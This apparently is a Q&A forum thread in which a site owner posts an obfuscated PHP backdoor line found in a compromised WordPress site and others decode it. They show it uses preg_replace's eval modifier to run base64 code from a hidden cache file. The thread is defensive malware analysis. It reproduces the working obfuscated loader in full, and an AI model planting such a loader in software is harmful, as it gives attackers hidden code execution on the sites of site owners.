5

I found an offending string in a client's WordPress-powered website, and I just want to know what it does.

@preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b","\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");

Can someone outline the steps it takes to decode this? I know what preg_replace() is, but I don't know how to decode the arguments to the function, or how PHP processes it into something it can make use of.

Dennis Wurster
  • 201
  • 4
  • 7

1 Answers1

10

Interesting. I like using python for this kind of task. You can follow along in a python (3.x) command line:

Input:

print(b"\x40\50\x2e\53\x29\100\x69\145")

Output:

b'@(.+)@ie'

Input:

print(b"\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b","\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75")

Output:

b'eval(base64_decode(implode("\\n",file(base64_decode("\\1")))));' L2hvbWUvd2ViL3VzZXJzLzIwMjkuYmlnNi9zaXRlcy9iaWc2L3B1YmxpY19odG1sL2ZvcnVtL2JiLWluY2x1ZGVzL2pzL2pxdWVyeS8uY2FjaGUvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==

That chunk of garbage is base64, as the call would imply, so let's keep going.

Input:

import base64
base64.b64decode(b"L2hvbWUvd2ViL3VzZXJzLzIwMjkuYmlnNi9zaXRlcy9iaWc2L3B1YmxpY19odG1sL2ZvcnVtL2JiLWluY2x1ZGVzL2pzL2pxdWVyeS8uY2FjaGUvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==")

Output:

b'/home/web/users/2029.big6/sites/big6/public_html/forum/bb-includes/js/jquery/.cache/.%828E%0013%B8F3%BC1B%B22B%4F57'

It looks like to get a good idea of what's going on, a closer look would be needed at the rest of the site, particularly that file that it's referencing; it's probably full of more lines of base64 encoded code. I think it is safe to assume that the site is pretty well compromised, though.. it's a good idea to pull the content and clean anything like this out, and start fresh with a new instance.

Shane Madden
  • 114,520
  • 13
  • 181
  • 251
  • 2
    This tickled my brain! – Campo Mar 18 '11 at 22:58
  • Actually, PHP has the same functions, that do the same thing. The "e" flag in preg_replace() tells PHP that once it's done substituting the L2hvb...== junk for `\1` in the command there, it should execute the command. The command reads that cache file into an array, implodes it into a string (which is apparently itself base64 encoded), then evaluates it. – DerfK Mar 18 '11 at 22:59
  • @DerfK Yeah, that hit me right after I posted - the `implode()` call made me stop and think, since that doesn't exist in python. Edited, thanks :) – Shane Madden Mar 18 '11 at 23:01
  • Just for the fun of it, I took a peek at the "/public_html/forum/bb-includes/js/jquery/.cache/.%828E%0013%B8F3%BC1B%B22B%4F57" file. The client installed Simple:Press a while back, a nice-but-primitive forum app. – Dennis Wurster Mar 19 '11 at 01:40
  • What I found in the /.cache/ directory was a collection of 10 different files, all base64 encoded. The specific file pointed to had contents related to building fake blog entries. As best as I can tell, it looks like it was only intending to show its fake pages to search engine spiders, and not to human visitors. – Dennis Wurster Mar 19 '11 at 02:02
  • @Dennis Huh. Interesting! Thanks for sharing what you found. – Shane Madden Mar 19 '11 at 02:04
  • Yeah, it was interesting, once I could read it. :-) I can't really tell if the vulnerability is in WordPress itself, a plugin, the ISP's server configuration, or the bbPress forum software though. I did find out that the installed version of bbPress was 1.0.1, and that there was a unix timestamp in some of the code that related to a date last October. I kept a copy of the 10 files before deleting them from the host. I'd put them somewhere in this post just for future readers' curiosity's sake. Any ideas about how to go about that? – Dennis Wurster Mar 19 '11 at 02:25
  • @Dennis Maybe put them on something like pastebin? As far as which software to blame: When in doubt, blame WordPress. – Shane Madden Mar 19 '11 at 02:30